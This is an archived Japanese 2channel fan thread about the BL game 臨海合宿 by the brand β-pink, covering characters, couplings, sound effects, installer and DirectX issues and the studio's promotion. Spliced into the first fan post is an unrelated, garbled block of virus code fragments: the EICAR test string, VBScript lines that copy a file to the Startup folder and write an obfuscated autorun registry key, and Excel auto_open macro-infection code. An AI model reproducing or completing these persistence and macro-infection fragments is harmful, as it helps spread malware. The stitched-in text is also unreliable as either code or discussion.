BL@β-pink総合2日目【臨海合宿】
■ このスレッドは過去ログ倉庫に格納されています
BLゲームブランド β-pink を語るスレです
新規さんも修業からのファンもsage進行でマターリいきましょう
『臨海合宿』 2007/10/26(金)発売
シナリオ:B太 原画:金目鯛ぴんく
・主人公総リバ。攻略キャラ5人
公式サイト
http://www.b-pink.jp/
■前スレ
BL@β-pink総合
http://game14.2ch.net/test/read.cgi/gboy/1181381219/
過去スレ等は>>2-
次スレは>>980さんお願いします 『臨海合宿』特典まとめ
オフィ ドラマCD 「真柴編」
兄 ドラマCD 「霧原編」
滅背 ドラマCD 「加持編」
祖父 ドラマCD 「太田編」
・滅背特典は以下も+
■ドラマの台本
■主題歌(ショートver.)
■主題歌 歌詞カード
■高画質デモムービー
■体験版
■書き下ろしショートストーリー『手つなぎ鬼』 公式では以下のものがDL出来ます
・臨海合宿体験版(キャラクターによるシステム説明(声付き)あり。エロあり)
・臨海合宿デモムービー
・臨海合宿主題歌「ピーカン☆Midsummer」
・臨海合宿壁紙 ED見たageスレで感想読んでたらやりたくなって今日ポチってきた! Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub
遅くなったが>>1乙!
前スレ1000超GJ
夢よ叶え…! 真柴ん襲い受けに期待してた自分
攻めでもおいしくいただいたけどな! 加持を攻略してからは
他のキャラを攻略すんのがいたたまれんかった…
全員美味しくいただきはしたけど、でも
真田が引っ越してった時とかー
真田がいない間自分を鍛えてた頃とかー
高校で真田の姿を見かけた瞬間とかー
…加持の気持ちを想像すると、堪らんのよ…っ
もう自分にはナチュラルに真田の姿に
『売約済・加持殿』の札の幻覚が見えるようになってます… >>1
乙です
>>13
襲い受けはこれをつつしむべし、ってツンデレ手帳に会則が…
>>14
加持は攻略してないと、時々いるかいないかわからんくらい
でかい身体でひっそりとしてるのがまた、なぁw >>14
自分もだw
霧原√のエピローグで毎晩霧原と電話してるらしい真田を、加持はどう思ってたんだろうとか考えるともう… >>16
しかもあの電話ときたら(ノ∀`)・゚・。 電話の内容ってやっぱりあの……いや……なんでもない………… この二人修業の時に同人誌出してたから
今回もそういうのに期待してちゃ駄目かな… 太田の馬鹿にされるぐらい慣れてしまえばどうってことない発言にちょっと悲しくなった。
馬鹿にされてるというか空気嫁って思われてるの知ってるんだよな太田。 太田もきっといろいろあったんだよ。
そういうところまでまとめて受け止めてくれる真田きゅんにカマ掘ってもらったんだから
太田も幸せもんだ。
,, - ―- 、
,. '" _,,. -…; ヽ
(i'"((´ __ 〈 }
|__ r=_ニニ`ヽfハ }
ヾ|! ┴’ }|トi } 男は度胸!
|! ,,_ {' }
「´r__ァ ./ 彡ハ、 受けも攻めもためしてみるのさ
ヽ ‐' / "'ヽ
ヽ__,.. ' / ヽ
/⌒`  ̄ ` ヽ\_
/ i ヽ \
,' } i ヽ
{ j l }
i ヽ j ノ | } l
ト、 } / / l | .|
! ヽ | ノ j ' |
{ | } | l |
ヽ | i | \ l /|
{ | l | | / |
l ! | l / |
公式BBSが落ち着いたのはいいんだが、スタッフからのコメント返しもなくなったな。
発売前より今の方が忙しいんだろうか。
何か企画を進めているとか。 企画があると仮定して、要望のあった武岡関連でくるか人気投票でくるか
個人的にはどっちでも大喜びなんだぜ 太田が眼鏡外したらエロゲ並にカワイイ‥思わず萌えてしまったw 臨海合宿 フルコンプ
物語としては面白いが、ゲームとしては最底辺だな。
共通ルートが判子の割に長いし、分岐は一緒に過ごす相手を選ぶだけって…。
前作はそれでも1周目は手探り状態だから楽しめたが、
今作ではフラグの立て方やイベントの起こるタイミングまで
前作と全く一緒で先が読めてしまうので、ゲーム性は全く無く最初からつまらなかった。
絵と話は良いだけに勿体無い。
絵師とライターだけでは面白いゲームはできないんだと痛感した。 絵師の友人が自分のブログで>>31と同じ感想を書いてたけど、
まさか同じ人じゃないよね… EDスレのコピペだね
それ以上のことは多分考えても無駄なんだぜ
それよりこの加持のタンクトップ、こいつをどう思う? EDスレからの転載だね。
自分はBLゲームにゲーム性は求めないと、いうか
むしろ狙ったルートを確実に見られる方が有難いので気にならなかったけど
次回作がダンジョンRPGとかになってたらそれはそれで面白そうだけどな! >>33 タンクトップはさほど気にならなかったんだが
いつ見ても腹のあたりにある脱ぎかけのYシャツが気になった
立ち絵もう少しバリエーション増やしてくれっつーのは贅沢か? あの黒のタンクトップ、誰かを思い出すと思ってたら
某水男子のガタイの良い人だ。
あっちは犬というより狼だったが。 >>33
すごく…小さいです…
あのピチピチのタンクトップの上からティクビ責めとか
あのきゅうくつなタンクトップに腕を突っ込んでティクビ責めとか
そんなものを見たいように思うんだ
でも乙女としてはそんなことをアンケート葉書に書けやしないんだ
お察しください >>36
Yシャツは着方もだけど誰もつっこまないのが気になった
もしかして普段は着てる事になってるのか?
スチルでちゃんとYシャツ着るてるやつあったし >>39がそんな事言うから、普段は普通に着てるのに
真田の目の前(立ち絵は真田視点?)でだけ一々あんな風にはだけては
脱いでも凄いんですアピールしている想像がよぎってしまったじゃないかどうしてくれる! >>39
テキストでもシャツ着てる事になってたよ。 >>41
そんなことアピールしても真田の敵愾心煽るぐらいしか効果なさそうだがw >>43
ボク、こんなに育ったんだよ!
褒めて褒めてー! >>44
みてみて! いちばん上の棚に手が届くよ! それ取ったげる!
褒めて褒めてー! 発売されて一ヶ月経ったね。
同じコンビでの次回作期待してるけど、また二年後とかかな。
FD激しく希望! あのエロタンクトップは実はスクール水着だったんだよ。 これ、衣ずれの音とか水音は入ってない?効果音はMAXにしてるんだけど聞こえてこない エロゲで衣擦れ音はあんまなくね?
水音は欄◯しか知らん。 リアルな演技?による尺八時の水音はめっちゃ聞こえますが。
改めて聞くとこれどうやって録ってるのかな…というのがちょっと気になったりする。 衣擦れ音と謎の水音はBLでも結構あるよ
キス音は自分の手のひらとか腕吸ったり、フェラ音は自分の指吸ったり、
秘所に指入れたりする時のグチュグチュ音は、半流動物を利用して音出してるって聞いたことあるな 効果音はこっ恥ずかしくなって聞くに堪えられんからいらねぇと思う自分は
少数派なのか? >>55
半流 動物ってなんだ!?とオモタw
水音より衣ずれのが興奮する 効果音なくて物足りないな
欄○並にやれとは言わないけど付けて欲しかった 別メーカーになるが、ノノとカフェリンは謎の水音が凄かったな 昔トゥナイトかなんかでAVかなんかの効果音の出し方を
やってた時は男側が自分の手の甲を吸って音を出していたのを見た
記憶があるような気がするが気のせいかもしれない >>62
チュッパ○ャップス程度ならそう苦でもないだろうw チュッパだったらくわえた時の「もご…むぐ」感が出せなくない?
いっそ張り型使っちゃえばいいw あのながーーーーーーーーーーーーーーーーーーーーーーーーいスタッフロールにイライラした
今でもイライラする!何度も何度もフルコーラスであの歌聴きたくない。しつこい そのうちあの何故かみょうに力の抜ける歌声もくせになるのさ… エンドロール入ったらヘッドフォン外して他の作業するなり
トイレ休憩入れるなりお茶入れるなりすればおk
つうか他社と比べても言う程エンドロールが長くない件 長くはないんだが、スキップできないからなぁ
でももう慣れたw いっそ某裸バスケの歌ほど突き抜けててくれればなぁw エンドロール中は他の作業してる
しっかし霧原EDワロタw 田島、遠藤、藤井あたりが気になるw
つうか真田女装萌えwww だが春木と加持の女装がないのが残念だ
せめて加持がシーツをまとってる絵ぐらい欲しかった >>81
まあ身長190前後だからな…
女装でなくてもなんか欲しかった
性的な意味で あのポニテ見たら着物とか似合いそうだと思ったよ
もちろん着崩した感じの 春木ですら着物あったのに、体育着ですか…(´・ω・`)
シーツでキモ女神風とかいじれお! >>84
シーツでキモ女神風ワロタw
いや、自分ゲーム途中では普通にそのスチル出てくるだろうと思ってたよw 話しぶった切ってスマヌのだが、
このゲームをインストールしようとすると
強制的にDirectXを新しいバーッジョンにインストールさせようと
するみたいだけど、回避できないのかな?
キャンセルするとエラー出て、ゲーム自体がインストールできないし・・・。
スペックは足りているし(DirectXの)、
DirectXは不具合が出ることがあるから今のままで使いたいんだよね。
DirectXが同梱されているのは普通だけど、
こんな風にゲームのインストールで強制的にDirectXのインストールまで
出てくるのは初めてなので困惑しとる・・・。 壱ラストの、歌の後に出てきた絵はなんぞ?
あの絵の不自然さに気付いてください描いた人。 机と一体化する特殊技能を幽霊の奴からいただいたんだな 確かに色々と不自然だけど(真田の手が骨折してたり)
あれは道場の床で勉強してるんじゃなかったっけ >>88-89
ありがとう。
今の自分のスキルで出来るかどうか分からないけど試してみる。
むかし使っていたPCでDirectXをアップグレードしたら
ディスプレイドライバと不具合おこして苦労したから、
DirectXのアップグレードは神経質になるんだ。
DirectXはアップグレードするとダウングレードもアンインストールも
できないし(やり方はあるけど)、強制的にインストールさせるような
ありがた迷惑なインストーラーは正直やめてほしかった。
せめてインストールするかしないか選べるようにしてくれれば
よかったのに、何でこんなインストーラーにしたんだろう・・・。 霧原…ええかげんにせいよ
初めての真田相手に何回戦…だからED後嫌われんだよw >>96
vistaだけど出なかった
手動コピーでいけたよ 資金が貯まったらFDの発売もあり……か。
つまり今のところ予定はないとorz
>>100
複数買いはやめとこうと思ってたのになんだか貢ぎたくなってきた
どうするかな・・・ >>100
真柴vs霧原が見たいw
真田は板ばさみになればいいよ 宇佐美の人はなんであんなに親子丼のときに生き生きとした声を出すんだw
武岡カワイイヨー >>103-104
霧・柴『どっちが先にイかせられるか(以下略』
真「ちょ、おま・・・アッー!」
そして二人に精気を吸い取られ
ぐったりとしている真田を介抱する加持w あ、よそでチェック外してたから
sageんの忘れてた ('A`)それ以前に萌え妄想はきもいです…脳内垂れ流し…… 宇佐美の中の人の演技にはクソワロタ
クールな変態かと思ったらおおっぴらに変態っぽいw 宇佐美は現在好きな脇キャラNO.1だ
武岡ルートは宇佐美込みで最高に萌えた
親子丼の念願が叶うことを自分もお祈りしておりますよ
スケキヨ丼みたいなのを想像した。>>113-115
全員海に刺さってる 真柴が真田の髪やら頬やらを優しく撫でているシーンが好き
真柴攻めイイ あけおめ姐さん方
>>120
すげえ!やったなあああ!
/ノ 0ヽ
_|___|_
ヽ( # ゚Д゚)ノ
| 个 |
ノ| ̄ ̄ヽ
∪⌒∪
よくやった>>120!
この埋もれた体操服をくんかくんかしてもいいぞ! >次回作とかファンディスクとか作る資金を貯めるため
スタッフガンガレ!!! >>120
GJ!!
ごめん、教えてほしい。
「Vistaでプレイするためにはインストーラーを使わず手動コピーするように。
その時はC\Program Files\以外に」と公式で言われてたから、
適当なフォルダを作って別のところにコピーしたんだが、
アンインストールするときはフォルダごとゴミ箱でいいのかな。
教えてくんでごめん。 >>128
それでいいと思う。
セーブデータをとっておきたいなら、インストールフォルダの直下にある
SAVE00??.DATを全て取っておくことをおすすめする。 >>129
ありがとう!
どう調べればいいのかわからなくて困ってたんだ。
セーブデータのこともありがとう。助かりました。 >>131
おおマジで?
よければどんなだったかkwsk 初BL作品出演で臨海のCMっぽい感じ
ロックンバナナのインターネットラジオからまだ聴けるよ
やっぱこの人の声好きだな〜 贅沢を言うなら、漁村見学の始めのほうでも、遠くでげらげら笑ってる声入れてほしかったなあ
真田的にはウザげな感じでw >>131
聞いてきた。教えてくれてありがとー
ってか念願だったのかよw 一生懸命説明してくれてるんだけど、死ぬほどいたたまれなくなったよ…w >>136
うん、トークもの聴き慣れてないせいもあって悶絶した…w
BLってほんとうに心臓に悪いなぁ!
声優さんてえらいなぁ…(つД`)
少しだけど修業の話まで出て驚いた
>>131>>133、貴重な臨海メディアミックス情報ありがとう〜
今更かもしれないが、臨海合宿特番が実現するように祈っとくよw 真柴ルート?(じゃなく共通ルート?)合宿二日目の
ボート騒動で感動してしまった…
未だ誰も落としてないけど臨海かなり面白いね!買って損はなかった! 臨海合宿買おうかと思ってるんですが、
購入相談所見てたら脇カプ有りとの事で…苦手なので迷ってます。
脇カプってどの程度ですかね?
誰と誰なのかも教えて頂けると有りがたいです(心の準備が出来るので) >>140
ネタバレ無い感じで聞きたいんだよな?
どの二人が脇カプかも知りたくない人がいるかもしれんので5行ほど改行します
1
2
3
4
5
あるルートによっては宇佐見と武岡がそれっぽい匂わせがある
シーンそのものはないが、あるシーンの二人を見た、という描写がある
それ以外のルートでは宇佐見がちょくちょく武岡にちょっかいは出してるが
本気か冗談かわからないような描写になってる
説明、これぐらいで大丈夫かな
ちなみに体験談はかなりネタバレしてるんでプレイする際は注意 某ルートでは、はっきり○○シーンを主人公と某が見てる描写があるし
「修業旅行」程度かなと思っていた自分は
結構ショックだったぜ(脇カプ苦手なんで)。
修業が気に入っていたので特攻したが
ネタバレでも体験版をプレイしとけばよかったと思った。
買う買わないはともかく、覚悟はできたし。 >>140
体験版にその脇カプシーンがあったから、やってみればいいと思う
そのシーンが製品版の中でも一番引っかかるところだと思うから
他は大したことないし >>140
体験版で確認するなら、メル欄のHシーン序盤で出るよ >>141-144
うおお皆さんレス有り難うございます!
過疎ってるとか言ってごめんなさい
宇佐見が誰か解らないんですが、とにかく目当てのキャラでなかったんで一安心です。
先に体験版やってみようかとも思ったんですが、
もうwktkが止まらなくて大変なのでレス後回しで即ポチってきました。
プレイ終わったらまた来ます…!! >>145
宇佐見は非攻略キャラ
ポジション的には修業の高野みたいなもん
・・・ってンなこと言っても修業やってないと分からんかw
臨海は結構楽しかったんだけど、もう少しスチルに力入れて欲しかったなあ
あからさまにデッサンいかれてるスチルだの、スラックスにベルトがないだの、ペンやら拳銃やら持つ手がウヘァだのと
しかもほぼ全部のスチルが鉛筆下描きをスキャンして色塗ったような感じだったし
次出す時はそのあたりをもう少し考えて作って欲しいなと 背景が進化しても肝心のスチルが退化しちゃ意味ないっすよb-pinkさん 絵心なくて違いが分からんわw
塗り方は修業旅行がイイヨイイヨ 霧原( *´д`)モエー
FDで真田とイチャコラするところが見たいよー
携帯でホニャララのやり取りをkwsk真田に言わせたい 霧原の中の人がラジオで臨海特集するって言ってたけど
もうやった? 上の方に上がってたラジオでは、またやりたいねーと言っててそれで終了だったと思ったが。
更新されてたの? これってあんまり売れてないのかな?
公式ブログも全然更新されないし…がんがってー なんというか、プロモーションのセンスがないんだよな・・・作品はいいのに
いつの間にか体験版とムービーが404になってるし >>154
ちょうど体験版考えてたとこだったからメルで聞いてみた
こんな夜中なのに返事くれたZE プロモーションのセンスがないのには同意。
ここのメーカー好きなんだけど、公式が放置状態なのと
絵師、ライターともあまり表に出てこないのが寂しい。
新作が出ればまた盛り上がると思うんだけどね。
作品を一本出したらそれで終わりじゃなくて、
それに続く展開を考えないと、いわゆるメーカー儲がつかないと思うな。 まあ、確かにここはアンチがいない代わりに熱狂的な信者もいないな… ここに熱狂的にはまってる自分が居るんだが、このスレ寂しすぎて…w
公式も全然動きがないんで、燃料投下期待してる。
もっと広報に金かけてほしいよな。冷微にSS載せてほしいよ 総リバとか、男子学生の賑やかな会話とか、売りの部分を残しつつ
ゲームとして進化してほしい。
修業は一作目だからちょっと安易な作りも気にしなかったけど、
臨海が完全焼き直しだったのは正直がっかりだ。
そういうのも含めて、ある程度経験のある人を引き込まないと
今後難しいんじゃないだろうか。 前にボブgえに携わった絵師とかライター使えば、そのゲームで獲得した絵師・ライター信者も取り込めるだろうしね
信者がいるようなライター・絵師をちゃんと起用できるか、呼べるかというのも問題。
名のあるところ呼べばお金かかるだろうし。
例えば裸で某スポーツするようなゲームの絵師レベルしか呼べなかったりしても困るし
声優ばかり豪華なクソゲーもたくさんあるし >裸で某スポーツするようなゲーム
むしろ、その某ゲームの絵師&ライターをセットで呼べば(ネタだけで)ちょっとは話題になって売れるかもよ
声優ばかり豪華な糞ゲーは確かに溢れてるけど、この板にいるといかに声ヲタが多いか思い知らされるんだぜ
リバゲーって時点で、結構人は選んじゃってるからなー あのゲームは…歌がネタになってそこそこ売れたんじゃないかなあ。スレチになりそうだけど。
ネタゲーにするんだったら、もっと破壊的な歌や画像を使うのも手かと思うww ゲームで作品ごとに目新しさがないのは致命的だよね
ネタにされるほど突き抜けてるわけでも
絵やシナリオに突出した部分があるわけでもないからなぁ
話題性がないというのは商業的にキツすぎる このメーカーも個性が出たらいいのにな
絵と声のビ●ッタ、ハードプレイと濃厚のピル●ラ、手堅い●プレ、読ませるキ●ルみたいな
リバゲで○○なβ-pink !!みたいな…
結構いいのに空気じゃ勿体無い
ってなぜここで戦略会議してるんだろうなw 「β-pink」というメーカー自体、このシナリオと原画のコンビで作ってるんだから
そこを変えたら別のメーカーじゃないか?
だから声優と企画で勝負するしかないと思うんだよね
アインの心理学は1作目と2作目でがらっと雰囲気変えても支持されてるし、
もう少し冒険してほしいな ライター・絵師はそのままでもストーリー展開は変えてほしい
ストーリー展開が前作と同じなのはどうよ、と思った
はっきりとは描写されてないけど、
「どう見ても前作キャラ」が出てくるのも少しなーという感じだった
個人的には従兄弟くらいに留めておいてほしかったな 全く同じ構成だったからねえ…なじみやすくてそれも好きだけど、
仮に次作品があって、それもこういう形式だったらちょっとイヤーヌだなあ。
声優は聞いてて気持ち悪くなければ割と何でもいい。声優にこだわる人からは許せんかもしれないけどもw 自分的には声優は冒険してくれてもいいがなー
古河氏の起用はGJだったし
システム的にはもうちょっと進歩してほしいのは確かだな
受け攻めポイント以外にもフラグ持たせてBAD系ENDも見たいよ 以前サイン会やった時、プロデューサーの人が
「あの二人にはなるべくこのまま学生物でやらせていきたい」的なこと言ってたって
イベント行った友人が話してた
今もそのスタンスなら、システムはともかく設定とかはそんな変わらないかもなー
でも次もそれじゃ、絶対飽きられるよな 学生をどう扱うかによるんじゃ?
伝記、SF、バトル、ホラーとかの要素を濃くして、年齢を上げたりするとか 学園物が得意ならそれはそれでいいけど。
ムリして他ジャンル書いてツマンナイとかそっちのがいやだ。
でも、書けるなら他の系統のもやりたい… 得意も何もワンパターンしか見てないから
シナリオがこれしか書けないのか、他も書けるのか分からないよね
ピル○ラだって新作含めて全部「学生物」だw
キャラや設定を一新しても、テーマが一貫してたら作風はブレないよ
学生物を続けるのはいいとしても
プロデューサーがいるならもう少し頭使ってくれ
一応「別レーベルから新作を出してる」っていう自覚が欲しいところ。
前作修行の設定を丸ごと使えるのはお手軽かもしれないけど、回顧厨しか喜ばないかもしれない
しかも攻略方法とか分岐(エロなしルート=女装)が全く同じときたら('A`)
臨海も嫌いじゃない(むしろ好き)なだけにひっかかるんです>< そもそも原画もライターもせっかく「β-pink」という自分たちの
ブランドを立ち上げたのに、大事に育てていこうという気概が感じられない。
これが一番問題なんじゃないかな…
同人サークルの方がまだ勢いがあるよ。 (´・ω・`)きっと資金がなくて栄養を与えられないんだよ。育てるべき芽に そりゃ資金難なのかもしれないけど、せっかく公式サイトあるんだし
イラストやSS載せたりはできるんじゃないかなあ。
ユーザーサービスの一環として。 ユーザーサービス多いメーカーは
スタッフが他社ゲーユーザーってのが多い気ガス
pinkスタッフってPCゲーやった事あるんかな
wktkする気持ちわかってるんかな 公式、新年の挨拶もなかったしね。
普通は何か一言ないか?今年もごひいきにとかさ。
客商売なめたらあかんよ。 でも、特に用がなければ新年早々公式見に行かないしなあ…
挨拶を期待するわけではないユーザもいるわけで、何か一言もないなめんなよとも思わない… しばらく見ない間に、なんという真面目なスレになっていることかー!!w お金がなくて広告は出せなくても
ちょっとしたスタッフブログの更新でもスレの話題になるし、
公式でも個人サイトでもSSや絵があればユーザーは大喜び
ユーザーもこの作品を盛り上げようって空気になるし
それがご新規さんへの販促にもなるはずなのにね
自分たちが作りたい物を作ってるだけで
出来上がった物を買うユーザーのことを忘れてるんじゃないかと思う、発売前も後も… 過剰なファンサービスはいらないけど、
メリーボーイズの轍を踏まないようにちっとは努力できないのかなあ。
少しくらい前作で得たものがあると思うんだけど。 >>181
>>180は挨拶しろと要求してるわけじゃなくて、
企業としての姿勢を言ってるのでは。
実際、今の公式はメリボの時を彷彿とさせるしね。 よく考えてみたら臨海が出てまだ四ヶ月なんだね。
今年も新作発表してくれて、以降年に一作出してくれれば
自分的には満足だなー
望み薄だとは思うけど期待はしてるので。 中小企業なんかでも、ホームページ作ってもあとほったらかしなんてところは多いわけで。
ネットで販売されまくるBLソフト販売としてはネット更新されてないのは致命的だけど、一般的な企業の姿勢としてはよくあることだよ。
まあ、一般企業はネット以外では年始挨拶なんかはするわけだけど。 同時期以降に発売した他メーカーは
季節イベントごとにカプ変えてSS出したり
人気投票始めたり、もう次作発表してる
たまに挨拶変わりの更新するだけでユーザーの印象違うのにな
ボブゲ業界で後展開を怠るのはもったいないよ 8000円のゲームでも、ドラマCDやらサントラやらグッズでゲームのお代以上に使ってることって全然珍しくないかならな
勿体ないホント ネットでのファンサービス第一号
主人公に太田を据えた簡易RPG、二頭身太田がてこてこ歩き回る!何かの材料を集める!
集まった材料で怪しげな道具を作るよ!何が作れるかは、あなた次第!
うわぁ…やりたくな…い……?('A`)? メラ星を捜せ! 画面いっぱいに広がった銀河の画像から、正しいメラ星を見つけ出せ!
メラ星スクリーンセーバー あなたのデスクトップに時折メラ星が出現するかもしれません
今日のメラ星 クリックするたびに今日のあなたのメラ星出現確率を占います 中の人が出来そうなことから始めよう…?
人気投票はCGI使えないと思うから
えーと 寒中見舞い絵とかSSでいいよ
本編で萌えられたから、それだけでも嬉しいのにorz
微妙に乗り遅れた話題だけど、自分はあの年齢の学生がきゃっきゃしてるのを見るのが好きなので
作風自体は維持して欲しいなぁと思う派 サイトデザインといいデモムービーといいなんか垢抜けないのがなあ
メリボの頃に比べれば大分進歩したし、体験版はすごいよかったんだけど
興味持ったけどやっぱりパス〜みたいな人もいるんだろうと思うともったいなさにイライラしてくる
>>196
>寒中見舞い絵とかSSでいいよ
それ見たいすごい見たい H以外では受けとか攻めとかはっきりわからんむしろ逆ですか?
くらいの関係が好きなので、今後もこの雰囲気は保っていただけると嬉しいなと
全リバが譲れない時点で、売り上げ的に茨の道を行けと言ってるも同然なので
心苦しくはあるが…
最終的には、主人公全リバとおっさん世代キャラさえ健在なら
放置プレイされてても次の動きがあれば一も二もなく買わせていただく
金使わせてくれ〜FDとかSS付き資料本とか出してくれ〜 次回も名前変えただけの主人公だったらさすがにスルーだな
攻略キャラの首すげ替えただけなんだもんw むしろ「普通の」攻略相手がいなくなってるのが痛い
痛い眼鏡・最初から主人公べったりの幼馴染・あからさまなツンデレ狙い・兄キャラ・おっさんキャラ なんかわかる。ゲームのキャラだからある程度はっきりした性格が良いとはいえ、極端。
例えばツンデレとか通り越して、ヤンデレもどきになってるし。
船の事件のあととかで普通にデレた方が心に響きそう。
他のキャラももうちょっと押さえた方が人間味が出て良いんじゃないかな。 そうかな 自分は修業より臨海のキャラの方が全体的にツボだった
好みの問題じゃないか? 同人誌出さないのかな
版権気にせず本を出すために新ブランド作ったのかと思ってた
安い印刷所使えば少しは利益出るんじゃ 祈りが届いたのか、公式が微妙に更新してる
でもやっぱり微妙だw
動いてるだけでも嬉しいので、この企画会議を生かして欲しいw また微妙なw
ビックリ体験版が出た時には変わったな!と思ったものだったけど
よーく考えれば修業の時は公式でドラマもらえたし
雑誌に絵がのったり、中の人でSS、同人誌と少ないなりにネタはあったもんな
普通の男の子達がふざけあってるのが面白いゲームは貴重だし
次回作も出て欲しいし、ぜひ公式へお布施になるようなものを出してくれ こんなに萌えで腹いっぱい満たされた気分になったゲームは初めてなので
またぜひ同じコンビでゲーム出して欲しいわー ロングバージョンw
EDで死ぬほど聴いてるが、ありがたくDLさせてもらうよw
中の人が生きてて良かった ゲームEDはロングバージョンじゃなかったのか!
今ごろ公開するとは、あの曲けっこう人気あったりする?
自分はゲームであの曲になるとその間はpcから離れていたがw
それでもしっかり覚えて今でも時々無意識に口ずさんでいるけどね 自分も見に行ったよw
いいんだ、もういい加減聞き飽きてるくらい聞きまくりの曲だって、更新されてるなら釣られてやんよ!
だからお願いします、もっと燃料ください…_| ̄|○
ところで、ぴーかんの歌詞って前から載ってたっけ? 前に歌詞を見た気がしないなー。中の人がんばっちゃったのかなあ(・∀・) コンプしてきた!久々にキュンときて困る
キャラデザ萌えでなんとなく買ったけど想像以上に話が面白かった
このライターさん全く知らないんだが、視点が結構平等というか
客観的というか好感が持てるね。体言止めが多いのは置いといて
キャラ達のちょっとした気遣いの言葉に時々ぐっときた(´;ω;`)
太田も霧原もましばもクラスメイトもおっさん達もいい人だなあ
壱はエロイなあ
あとはスチルの崩れが…。立ち絵はいいのにな ゲームでのボツCGでも使ってたまにファンサービスしてくれると(・∀・)イイ! ああ…なぜだろう、あのノー天気な歌、最初はエンディングで延々流れて「チッ」って感じだったのに
だんだん頭の中で回る回るよー歌詞も覚えてブツブツ歌ってるよー BPにて臨海書下ろしがありそうな予感www
ページが作ってあるってことは期待していいんだよな?
駄目っていわれても期待してしまうw
うれしい反面公式企画でやるなり
ファンブック発売するなりしてほしいという複雑な気持ち
好きな作品に金銭投資するのは厭わない!
関連商品やりすぎな某ブランドとまではいかなくていいから
β-pinkはもっと貪欲でいいと思う…中の人ガンガレ!
中の人ガンガレ
そしてFDを…
後日談の小説とか、同人誌でもいいから出してほしいな。
ほれ込んだBLゲーに思うことだけど、くっついたーハイEND!なのが
もっと見ていたくてほんと物足りない FDがでたら定価でオフィ買いするから!(´;ω;`)FDだしてえええええええええ オカルト:1
地元のため:1
犯罪:3
漁村も大変だな 一般乙女を例に出して申し訳ないが、同人誌的扱いでいいから、
イヅナみたいなFANBOOK出してくれんかなぁ
絶対買うんだけど >226
あそこまで豪華内容&徹底攻略じゃなくても
設定資料と書き下ろしSSだけでも買うよ 真田攻め本と真田受け本で分ければ、
どっちかだけ欲しい人や両方大丈夫な人、苦手はあるけど
カプ散在してるから2冊買わなきゃって人、
みんなに間口を用意できるし売り上げUPするよ中の人
ぜひ! (´・ω・`)苦手はあるけど出たら多分両方買っちゃうっ…くやしいっ!www 後押しスレで後押しされて吹っ飛んできた
なんで今まで買うの迷ってたのか分からない
南部たんもナオも可愛いよハァハァ
「見たやつの目をつぶす」噴いた
おお〜。いらっしゃい
書き込みは少ないけど、みんな潜伏してるだけなんだぜ
萌え語りしたいんだぜ むしろ真剣に戦略会議してしまうこのスレの住人大好きw >>233
同意www
それで公式がさらに広報がんがってくれれば同志も増えてくれる…
頑張れ中の人! 広報だけはマジでがんがってくれww
修業は狗と発売日被ったせいもあって押されぎみだったけど
もっとやりようはあったはずだし
臨海は発売日かぶってないのに冥土と新婚に売り場独占されてて泣けた
中の人ガンガレー!広報ガンガレー!
餌がもらえず飢えてるここの住人もガンガrwwwwww
ほんと飢えてるんだ
とりあえずカプ話でもしようか
どのカプが好きかとか独り言でもいいから
自分は真柴真田と真田真柴がツボだった
あとイチとナオはやっぱりいいね 発売前は他目当てだったのに思いの他真田霧原に萌えた
霧原ルートはラブ分多めで満足感あったな 霧原はあんまり得意なキャラじゃなかったんだが真相判明後の引きこもりっぷりで一気に転んだ
あと太田はいただいていきますね 大田は絶対ウザイキャラだと思ってたらウザイはウザイでもウザカワイくて萌えた
微妙に殺伐としてる前半、大田の存在が本当救いだった
眼鏡を外したら美少女とか少女漫画すぎるよ大田
(´・ω・`)ずっとうざいままだった…。ごめんよ太田、よさがわかってあげられなくて…… どのキャラもまんべんなく好きだが
ただ従兄弟にすべて持っていかれた感が…否めない 武岡かわいいよ武岡(´Д`;)ハァハァ
よもやオッサンにあんなに悶えることになろうとは…
真田武岡も武岡真田もたまらん イチ真田、真田霧原に萌えたなあ
主攻ゲーに常に飢えてて
修業も臨海も主攻目当てで購入してるけど
どっちも主人公が好みのタイプの受でもあって
まさしくリバどっちも楽しめました ご馳走様でした 太田と真柴の合宿続行ルートを回収しようと思いつつ、ついイチor霧原ルートにいってしまう/(^O^)\ 自分は2キャラ丸々未攻略だ
単に寒くなってハダカ見るのが辛くなったという理由だがw >>246
萌えカプは違えど、自分も似たような感じだな
主攻め好きというか、攻略キャラの受けを見たい場合が多いんだけど
南部も真田もウハウハ攻略したいタイプなんだよね
おかげでどの組み合わせでもどっちかは必ず気に入るので幸せだ
皆可愛いすぐる…
>>248
あっちはあっちでまたおいしいぞ、もったいないぞw PC新調してVistaにしますた。
よーしパパ攻略途中だった臨海を最後まで一気にやっちゃうぞ!
セーブデータのバックアップはばっちりだぜ!
>臨海合宿は、公式には対応OSとしてVistaをサポートをしておりません。
( ゚д゚) ・・・
(つд⊂)ゴシゴシ
(;゚д゚) ・・・
(つд⊂)ゴシゴシゴシ
_, ._
(;゚ Д゚) …!?
持っててよかったVirtualPC >251
手動コピーだかで、Vistaでも動くって回答が
公式のBBSだか、ここの過去ログだかで出ていたよ 真柴END後をライターさんの文で読みたいよ
霧原も来るし、真柴のジェラシー戦争になるな
明るく笑わせてくれそう >>253
「…あいつは気に入らない」の加持も忘れるな!w 宇佐美マインスイーパというおまけゲームが夢に出てきました('A`)アウ… >>259
ちょ、プレイ中に想像してタイムが落ちたらどうしてくれるw
犬HKの歌番組で、医者コスプレのバックダンサーを見た
